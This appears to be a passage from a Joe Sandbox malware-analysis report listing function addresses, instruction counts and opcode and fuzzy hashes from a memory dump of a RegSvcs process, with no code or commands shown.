                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_1830000_RegSvcs.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 4ec2df2eb7b9cbe96050ab370fdcf7cf9b58165d4e77db0193ad2ba3060f29f8
                                            • Instruction ID: d74f60074ce1528e9f461aba1d071170b829c41c28ff6e18054ad9226dbe2ebe
                                            • Opcode Fuzzy Hash: 4ec2df2eb7b9cbe96050ab370fdcf7cf9b58165d4e77db0193ad2ba3060f29f8
                                            • Instruction Fuzzy Hash: 6FF0E2716116519FEF33979CC148B517BD49B807A4F0D942DD506C7552C761FB80CAD1
                                            Function 018A2619 Relevance: .0, Instructions: 31COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.2216038289.0000000001830000.00000040.00001000.00020000.00000000.sdmp, Offset: 01830000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_1830000_RegSvcs.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 6c7572fa5744a55e43c142e8942155ae64e2404789e34097860efd8d5a2ca0e7
                                            • Instruction ID: c78db8a7db3aa7d4c5d29eb7829f1c1ec36f21a2858d0fdd0d86c96324e48079
                                            • Opcode Fuzzy Hash: 6c7572fa5744a55e43c142e8942155ae64e2404789e34097860efd8d5a2ca0e7
                                            • Instruction Fuzzy Hash: 31E092323416012BE7219E5D8C80F47776E9F92B10F440479B6049E251C9E2DE0982A5
                                            Function 018F6030 Relevance: .0, Instructions: 29COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.2216038289.0000000001830000.00000040.00001000.00020000.00000000.sdmp, Offset: 01830000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_1830000_RegSvcs.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 2f21787fc4cf88bc2024fb188b518997cea13084236808dfde9be923dffdf6d3
                                            • Instruction ID: ed9753b370396955b0149883881204bc11cdd70556354f09abc4c76523160ae8
                                            • Opcode Fuzzy Hash: 2f21787fc4cf88bc2024fb188b518997cea13084236808dfde9be923dffdf6d3
                                            • Instruction Fuzzy Hash: 45F0A0721002049FE3208F09D840F52B7F8EB55368F25C129E708EB160E33AED40CBA0
                                            Function 01860710 Relevance: .0, Instructions: 28COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.2216038289.0000000001830000.00000040.00001000.00020000.00000000.sdmp, Offset: 01830000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_1830000_RegSvcs.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 09d204908d37cdfbcfc5d4a721560e7c3d6986de64c378e18d154b12347e5c6c
                                            • Instruction ID: ffccefc2245c9dcc5daa57726e773614f65464473e93a2f0de1331140f6123fb
                                            • Opcode Fuzzy Hash: 09d204908d37cdfbcfc5d4a721560e7c3d6986de64c378e18d154b12347e5c6c
                                            • Instruction Fuzzy Hash: 0EF0E5392043459FDB1ACF19D050AD57BA8FB41360F004094FC46CB301D736EB81CB95
                                            Function 018949D0 Relevance: .0, Instructions: 28COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.2216038289.0000000001830000.00000040.00001000.00020000.00000000.sdmp, Offset: 01830000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_1830000_RegSvcs.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: f1b670d1cf9650df618e53f56da6216e466ca8c332a8d3f17e7fbf4f9511b07c
                                            • Instruction ID: 5153e7afc93dcc967da5abdeef100ea61246689e38cc1ab69750209788614ecc
                                            • Opcode Fuzzy Hash: f1b670d1cf9650df618e53f56da6216e466ca8c332a8d3f17e7fbf4f9511b07c
                                            • Instruction Fuzzy Hash: 70E0D833244149AFDB211A5D8900B6677E5DBD27A0F1D0429E202DB151DB78DE42C7D8
                                            Function 01934164 Relevance: .0, Instructions: 27COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.2216038289.0000000001830000.00000040.00001000.00020000.00000000.sdmp, Offset: 01830000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_1830000_RegSvcs.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 9ced5a7c458a03f9b6148b28d1125c899f15810cf31d7d9a6e0e2c8057b69c47
                                            • Instruction ID: 259a08b52940342608f96e6ec66add2efe0519797bf3106d330c4b7fd766e9cf
                                            • Opcode Fuzzy Hash: 9ced5a7c458a03f9b6148b28d1125c899f15810cf31d7d9a6e0e2c8057b69c47
                                            • Instruction Fuzzy Hash: DBF06531A35D914FEB72D7ACD544B5577E9BBE0731F5B05A4D409C7922C724EC80C690
                                            Function 0190678E Relevance: .0, Instructions: 27COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.2216038289.0000000001830000.00000040.00001000.00020000.00000000.sdmp, Offset: 01830000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_1830000_RegSvcs.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 9c57e87189bc66aa7caf2535f5315d36853ca328742cb6eaba8c93c68780cd6a
                                            • Instruction ID: 7fd675733be6f0e4d2f153336ad4905eecc2ee46fca47eb0debe12877969e712
                                            • Opcode Fuzzy Hash: 9c57e87189bc66aa7caf2535f5315d36853ca328742cb6eaba8c93c68780cd6a
                                            • Instruction Fuzzy Hash: 50E0DF32A00214BFDB2297998E01F9ABEBCDB90FA0F090058B604E70D0E630DF00C690
                                            Function 019308C0 Relevance: .0, Instructions: 25COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.2216038289.0000000001830000.00000040.00001000.00020000.00000000.sdmp, Offset: 01830000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_1830000_RegSvcs.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: c6a5ad91a7d0f1a4d9806dabaf8f22ecb250b1deeb68cfbfcde1a852261f70b4
                                            • Instruction ID: 207262e27608a928cb306de5622a67b12e58dd726148b3c099459f287395febe
                                            • Opcode Fuzzy Hash: c6a5ad91a7d0f1a4d9806dabaf8f22ecb250b1deeb68cfbfcde1a852261f70b4
                                            • Instruction Fuzzy Hash: 33E09B316403508BCB258E1DD140A53B7ECDFD5661F198479E90D47612C232F852C6D1
                                            Function 018625E0 Relevance: .0, Instructions: 23COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.2216038289.0000000001830000.00000040.00001000.00020000.00000000.sdmp, Offset: 01830000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_1830000_RegSvcs.jbxd
                                            Similarity
                                            • API ID: InitializeThunk
                                            • String ID:
                                            • API String ID: 2994545307-0
                                            • Opcode ID: 03738cb30e3e20bf3991c04ed20b721ac9cf9fcaac3cd002590760b694906e02
                                            • Instruction ID: 3225f4b18801f48265648a0d506b2a4a82691740a69dc3fd3147f91173081a9e
                                            • Opcode Fuzzy Hash: 03738cb30e3e20bf3991c04ed20b721ac9cf9fcaac3cd002590760b694906e02
                                            • Instruction Fuzzy Hash: 88E092321006549BC321BB2DDD01F8A779AEBA0364F014515B115971A0CA30AE10C795
                                            Function 0191A456 Relevance: .0, Instructions: 23COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.2216038289.0000000001830000.00000040.00001000.00020000.00000000.sdmp, Offset: 01830000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_1830000_RegSvcs.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 1c3962ef014767a9d047a1ce435ecdb8fc5cd5a05dfca32f291fec24eb47eca0
                                            • Instruction ID: e81c3a24030f68cf81371ceece07b1f7b3ca9dd0f84db3bd52dc55015acb0704
                                            • Opcode Fuzzy Hash: 1c3962ef014767a9d047a1ce435ecdb8fc5cd5a05dfca32f291fec24eb47eca0
                                            • Instruction Fuzzy Hash: 3BE09231051651DFE7326F2EC848B52BAE5BF50B12F148C2CA19E424F0C7759DC1DA41
                                            Function 018E4000 Relevance: .0, Instructions: 22COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.2216038289.0000000001830000.00000040.00001000.00020000.00000000.sdmp, Offset: 01830000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_1830000_RegSvcs.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: d217a6aac874400d2fdd0dd0cc4ad7a97c57c110d53f39d941a96e3fabb04b1b
                                            • Instruction ID: 4a76d3d78dc925c233afe1c9e4f202c0df19ab5c19b63cf59249f3906d839e67
                                            • Opcode Fuzzy Hash: d217a6aac874400d2fdd0dd0cc4ad7a97c57c110d53f39d941a96e3fabb04b1b
                                            • Instruction Fuzzy Hash: 16E0AE343002058BE755CF1AC044B627BA6BFD6B10F28C078A9488F205EB32A9428A40
                                            Function 0189CA38 Relevance: .0, Instructions: 22COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.2216038289.0000000001830000.00000040.00001000.00020000.00000000.sdmp, Offset: 01830000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_1830000_RegSvcs.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 3de513aadebbcc39811d50ec301e15a5d34075da58c82198b6631182de3f4e1a
                                            • Instruction ID: 8d12239636aa18c6e7b97c3e351986b6126d776ae3efaa48241502279db39c57
                                            • Opcode Fuzzy Hash: 3de513aadebbcc39811d50ec301e15a5d34075da58c82198b6631182de3f4e1a
                                            • Instruction Fuzzy Hash: EFD02B724850606ACF36F11C7C04F973ADAAB50770F094C60F108D2010D759CE8193C4
                                            Function 0185823B Relevance: .0, Instructions: 21COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.2216038289.0000000001830000.00000040.00001000.00020000.00000000.sdmp, Offset: 01830000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_1830000_RegSvcs.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 2b708af5a461c1f99ac8d3b2cba32ed51933f6cdd1bf79975374bbcdf42faac7
                                            • Instruction ID: 0c384ce3766c7e3ed7ead31bea841abd72a6733b4cb037b3a9695677baa7392a
                                            • Opcode Fuzzy Hash: 2b708af5a461c1f99ac8d3b2cba32ed51933f6cdd1bf79975374bbcdf42faac7
                                            • Instruction Fuzzy Hash: 2EE08C31104A14EFEB322E2BDC00B517BA2FF95B90F10482AE482864A48670AA82DA46
                                            Function 01862050 Relevance: .0, Instructions: 20COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.2216038289.0000000001830000.00000040.00001000.00020000.00000000.sdmp, Offset: 01830000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_1830000_RegSvcs.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 4ac4f2e4de0ee9cbba0d351c0d51b48cfbde077107ce294824e84243d5a3d9f1
                                            • Instruction ID: b729edb7e3eb86a83ea39dca488b180e7604203ceec5a1a56f0f8d559b2cc663
                                            • Opcode Fuzzy Hash: 4ac4f2e4de0ee9cbba0d351c0d51b48cfbde077107ce294824e84243d5a3d9f1
                                            • Instruction Fuzzy Hash: 03E0C2331015506BC311FB6DDD41F4A739EEFA4360F000221F151D72E0CA20EE00C796
                                            Function 01898A90 Relevance: .0, Instructions: 20COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.2216038289.0000000001830000.00000040.00001000.00020000.00000000.sdmp, Offset: 01830000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_1830000_RegSvcs.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 4861f5a381a69e507ddb33788bd9690c3cd67957beffc440e81982ecee0e9c4e
                                            • Instruction ID: 2f85b015491076f397f015e2976138c339f390a9b9ffc277d9e8edb78631f64e
                                            • Opcode Fuzzy Hash: 4861f5a381a69e507ddb33788bd9690c3cd67957beffc440e81982ecee0e9c4e
                                            • Instruction Fuzzy Hash: 23E08633111A188BC728DE18D512B7277E4EF46720F09463EA61387780C534E544C795
                                            Function 018B6AA4 Relevance: .0, Instructions: 17COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.2216038289.0000000001830000.00000040.00001000.00020000.00000000.sdmp, Offset: 01830000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_1830000_RegSvcs.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 2a1cd49be4a36f16e465d6e8719326e712c3afc978f3fe3bf45b66f7a6b88852
                                            • Instruction ID: 19d3ed3a5fe45c8cd3d52b6843063e2a4e136be0df45fa7ab45a04d7ccfa86ef
                                            • Opcode Fuzzy Hash: 2a1cd49be4a36f16e465d6e8719326e712c3afc978f3fe3bf45b66f7a6b88852
                                            • Instruction Fuzzy Hash: 59D05E36511A50AFD7329F1BEE40C53BBF9FBC4B10705062EA54583A20C670E906DBA1
                                            Function 0189E59C Relevance: .0, Instructions: 16COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.2216038289.0000000001830000.00000040.00001000.00020000.00000000.sdmp, Offset: 01830000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_1830000_RegSvcs.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 7eba0efce7d9c3098aed64107f138979cd55621edccfcfde5a0f983e140fadca
                                            • Instruction ID: cd511628931613b0d14ca2a3ba076f8ac2785bfa2ab5cee2f3280edec34b3b66
                                            • Opcode Fuzzy Hash: 7eba0efce7d9c3098aed64107f138979cd55621edccfcfde5a0f983e140fadca
                                            • Instruction Fuzzy Hash: 67D02233604620AFE732AA2CFC00FC333E8BB98720F060459F018C7050C360EC81DA84
                                            Function 018DE908 Relevance: .0, Instructions: 16COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.2216038289.0000000001830000.00000040.00001000.00020000.00000000.sdmp, Offset: 01830000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_1830000_RegSvcs.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 6e9bfb4306c29fdb1c5fce9039323a2740af754b7679fb8de59faa530781556d
                                            • Instruction ID: 158bbe4ca53f8e868881e579790dfbfa263ae371051a1971e441fd1d3d765038
                                            • Opcode Fuzzy Hash: 6e9bfb4306c29fdb1c5fce9039323a2740af754b7679fb8de59faa530781556d
                                            • Instruction Fuzzy Hash: 14E0EC35951784AFDF12DF6DC640F5EBBB9BB94B40F550054A5089F660C624EA00DB81
                                            Function 0185A0E3 Relevance: .0, Instructions: 15COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.2216038289.0000000001830000.00000040.00001000.00020000.00000000.sdmp, Offset: 01830000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_1830000_RegSvcs.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: c1fe28d2b99599f70fe9b16ebd98ffdfbd128d642cd65cc2bf81b3ea4870f6a7
                                            • Instruction ID: 2db5ac1c2f2dd1c6d1c3381130e86fa8cd54d163d8b68635adc7d5b7b1d90626
                                            • Opcode Fuzzy Hash: c1fe28d2b99599f70fe9b16ebd98ffdfbd128d642cd65cc2bf81b3ea4870f6a7
                                            • Instruction Fuzzy Hash: B5D0223222203093DB2C56696880F637905FBC0B94F0A012C3C0AD3800C0048D43E2E1
                                            Function 0189A830 Relevance: .0, Instructions: 14COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.2216038289.0000000001830000.00000040.00001000.00020000.00000000.sdmp, Offset: 01830000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_1830000_RegSvcs.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 950ff3e2fa24c389401d46e2ae40292d2d63fe10973766e9e1870c80e88d3a0a
                                            • Instruction ID: 813e57a6811fb33eac8cf7934c5051011562cda9ca06aaf5d65c7298ed711717
                                            • Opcode Fuzzy Hash: 950ff3e2fa24c389401d46e2ae40292d2d63fe10973766e9e1870c80e88d3a0a
                                            • Instruction Fuzzy Hash: 9AD012371D054DBBDB119F66DC01F957BA9E7A4BA0F444020B904C75A0C63AE950E585
                                            Function 0189CA24 Relevance: .0, Instructions: 14COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.2216038289.0000000001830000.00000040.00001000.00020000.00000000.sdmp, Offset: 01830000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_1830000_RegSvcs.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: d6663605e2b76167def25a93d8c0a4ec530411a51373694f053462f167cb6753
                                            • Instruction ID: ad80ab8aa349c00fb3a88d50de29c84613a0a87c929df50d5090942ef0c0f7de
                                            • Opcode Fuzzy Hash: d6663605e2b76167def25a93d8c0a4ec530411a51373694f053462f167cb6753
                                            • Instruction Fuzzy Hash: 0AD0A930606202CBEF2ACF18CA90E2E3BB1FF10740B84006CEB00E2020E32ADE01DB10
                                            Function 0189C700 Relevance: .0, Instructions: 12COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.2216038289.0000000001830000.00000040.00001000.00020000.00000000.sdmp, Offset: 01830000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_1830000_RegSvcs.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: a4bbd7c5c996c6314633515492723e329d7ccf5f4dcb798370ffde6045762c53
                                            • Instruction ID: 019abd13f4d6263e639d48de9c7ab23eae861f67aab8ab58ec454f5ea429901d
                                            • Opcode Fuzzy Hash: a4bbd7c5c996c6314633515492723e329d7ccf5f4dcb798370ffde6045762c53
                                            • Instruction Fuzzy Hash: 69C01232290648AFD712AAA9CD01F027BA9EBA8B40F000021F6048B670C631E920EA86
                                            Function 01880310 Relevance: .0, Instructions: 11COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.2216038289.0000000001830000.00000040.00001000.00020000.00000000.sdmp, Offset: 01830000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_1830000_RegSvcs.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: b20a69916aee968c3675073d0381efa581de60bf3984a7ac555cf611b84c4bee
                                            • Instruction ID: 9ad0e48b9f4b01c22ca869574b8eb317647351d7f3b56962f51522e93b6a8524
                                            • Opcode Fuzzy Hash: b20a69916aee968c3675073d0381efa581de60bf3984a7ac555cf611b84c4bee
                                            • Instruction Fuzzy Hash: 98D01236100249EFCB02EF45D890D9A772AFBD8710F108019FD19076108A31ED62DB50
                                            Function 01860750 Relevance: .0, Instructions: 9COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.2216038289.0000000001830000.00000040.00001000.00020000.00000000.sdmp, Offset: 01830000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_1830000_RegSvcs.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 8541d5aa43a0a658d79fe6471d8132b1696e53b2ec5469e0c5791f15c56add93
                                            • Instruction ID: 710e16a4cbc04f8209697d0596433ca3982db3c287cba06cfe4138d24d456505
                                            • Opcode Fuzzy Hash: 8541d5aa43a0a658d79fe6471d8132b1696e53b2ec5469e0c5791f15c56add93
                                            • Instruction Fuzzy Hash: 89C04C757115418FCF15DB1DD2D4F8977E4F744740F150890E805DB721E724E941DA12
                                            Function 018A4340 Relevance: .0, Instructions: 4COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.2216038289.0000000001830000.00000040.00001000.00020000.00000000.sdmp, Offset: 01830000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_1830000_RegSvcs.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 95da57dea59217b02367e5a7bb4aee3d81b9fe3a5609cd13ae1832819dd4fbc2
                                            • Instruction ID: bd8a1795daef4b3cddff84a8c5b7a59145caa971803f39105b98914b8742c21f
                                            • Opcode Fuzzy Hash: 95da57dea59217b02367e5a7bb4aee3d81b9fe3a5609cd13ae1832819dd4fbc2
                                            • Instruction Fuzzy Hash: E790023160580016914071584CC45864009A7E1301B55D011E1429564CCA148B5E5762
                                            Function 018A4650 Relevance: .0, Instructions: 4COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.2216038289.0000000001830000.00000040.00001000.00020000.00000000.sdmp, Offset: 01830000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_1830000_RegSvcs.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 31807a34f7b18529507c21abb5d709b62355f3ae4f7a4eae43f46b16fd7cebc4
                                            • Instruction ID: 2332f337d6cca572a0c598001c4f755099f5f95ad7d1a866555f5eb6b7216c7b
                                            • Opcode Fuzzy Hash: 31807a34f7b18529507c21abb5d709b62355f3ae4f7a4eae43f46b16fd7cebc4
                                            • Instruction Fuzzy Hash: D190026160150046414071584C444466009A7E2301395D115A1559570CC6188A5D976A
                                            Function 018A2B80 Relevance: .0, Instructions: 4COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.2216038289.0000000001830000.00000040.00001000.00020000.00000000.sdmp, Offset: 01830000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_1830000_RegSvcs.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 5a75f16b36fec44bd7664bc0bd67e0066d755a7f66c02b742113e9a96bbac977
                                            • Instruction ID: f4868a672c092634e62eaa317c63b51cdc75ab744532338beaf9fe6029a6f078
                                            • Opcode Fuzzy Hash: 5a75f16b36fec44bd7664bc0bd67e0066d755a7f66c02b742113e9a96bbac977
                                            • Instruction Fuzzy Hash: 4D90023120140806D10471584C446C6000997D1301F55D011A7029665ED6658A997632
                                            Function 018A2BA0 Relevance: .0, Instructions: 4COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.2216038289.0000000001830000.00000040.00001000.00020000.00000000.sdmp, Offset: 01830000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_1830000_RegSvcs.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 387941cc3d9ead37390c8fa03c11a44338d0e37a1a868a5e4832f2bd456abaff
                                            • Instruction ID: db9a1d26bb9356501573ee70ed6ef20ccb300257ea97376d4dd2d11d732d5f4e
                                            • Opcode Fuzzy Hash: 387941cc3d9ead37390c8fa03c11a44338d0e37a1a868a5e4832f2bd456abaff
                                            • Instruction Fuzzy Hash: 8690023160540806D15071584854786000997D1301F55D011A1029664DC7558B5D7BA2
                                            Function 018A2BE0 Relevance: .0, Instructions: 4COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.2216038289.0000000001830000.00000040.00001000.00020000.00000000.sdmp, Offset: 01830000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_1830000_RegSvcs.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: abc59b7fde517867bd953a15ac3ade4cfb846bd5e277521736bb8b3c9e4e3b47
                                            • Instruction ID: 242b7171aeb29661a3dd002297d451330e3826d44fb65aec84edf8e440b39135
                                            • Opcode Fuzzy Hash: abc59b7fde517867bd953a15ac3ade4cfb846bd5e277521736bb8b3c9e4e3b47
                                            • Instruction Fuzzy Hash: DC90023120544846D14071584844A86001997D1305F55D011A10696A4DD6258F5DBB62
                                            Function 018A2AB0 Relevance: .0, Instructions: 4COMMONLIBRARYCODE
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.2216038289.0000000001830000.00000040.00001000.00020000.00000000.sdmp, Offset: 01830000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_1830000_RegSvcs.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 4b67033f0f6deb182830fa180763aa0bdb91a594d9b5cde8cdec4496a777915c
                                            • Instruction ID: bdfd9bf4adf5db0cca183e5fa6029d1d76a9ae1982cbb144e341c2485c6f5986
                                            • Opcode Fuzzy Hash: 4b67033f0f6deb182830fa180763aa0bdb91a594d9b5cde8cdec4496a777915c
                                            • Instruction Fuzzy Hash: 3C9002A1201540964500B2588844B4A450997E1301B55D016E2059570CC5258A599636
                                            Function 018A2AF0 Relevance: .0, Instructions: 4COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.2216038289.0000000001830000.00000040.00001000.00020000.00000000.sdmp, Offset: 01830000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_1830000_RegSvcs.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 5697d33aad45207c7a50dccebc0fa59e337f1b5901f189e5ade8f9cee6550a95
                                            • Instruction ID: ca21d4cb26c386bb0ecd70e14be343ddf250e07f25e447fc98441ebfbe225e73
                                            • Opcode Fuzzy Hash: 5697d33aad45207c7a50dccebc0fa59e337f1b5901f189e5ade8f9cee6550a95
                                            • Instruction Fuzzy Hash: A7900225221400060145B5580A4454B0449A7D7351395D015F241B5A0CC6218A6D5722
                                            Function 018A2DB0 Relevance: .0, Instructions: 4COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.2216038289.0000000001830000.00000040.00001000.00020000.00000000.sdmp, Offset: 01830000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_1830000_RegSvcs.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 1634ca87bac1a292948bb196e323ec6363eba845819b313dd805da46b229563c
                                            • Instruction ID: 432302f11cb08f6cf6ac331ec8444e30948e3620d735e01a077c875aa4f88ed6
                                            • Opcode Fuzzy Hash: 1634ca87bac1a292948bb196e323ec6363eba845819b313dd805da46b229563c
                                            • Instruction Fuzzy Hash: BF90023124140406D14171584844646000DA7D1341F95D012A1429564EC6558B5EAF62
                                            Function 018A2D00 Relevance: .0, Instructions: 4COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.2216038289.0000000001830000.00000040.00001000.00020000.00000000.sdmp, Offset: 01830000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_1830000_RegSvcs.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: f893a658d6131684763dec48aa70d89f8d9d142371afe8b90f7dd8faaad3dd46
                                            • Instruction ID: e23c7ea29546540d04fe1580bacf859cd375d3d34b81950020f66ed642e1ed04
                                            • Opcode Fuzzy Hash: f893a658d6131684763dec48aa70d89f8d9d142371afe8b90f7dd8faaad3dd46
                                            • Instruction Fuzzy Hash: F390022120544446D10075585848A46000997D1305F55E011A20695A5DC6358A59A632
                                            Function 018A2CC0 Relevance: .0, Instructions: 4COMMONLIBRARYCODE
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.2216038289.0000000001830000.00000040.00001000.00020000.00000000.sdmp, Offset: 01830000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_1830000_RegSvcs.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 9bbd9c4a3f62d3df78fdebd87c6b93aa49512bdde0df3928f965ff159e1286a4
                                            • Instruction ID: 104dfc23f476e55835fded525c2355680aa20b03b7be8113575346af5cd64e6f
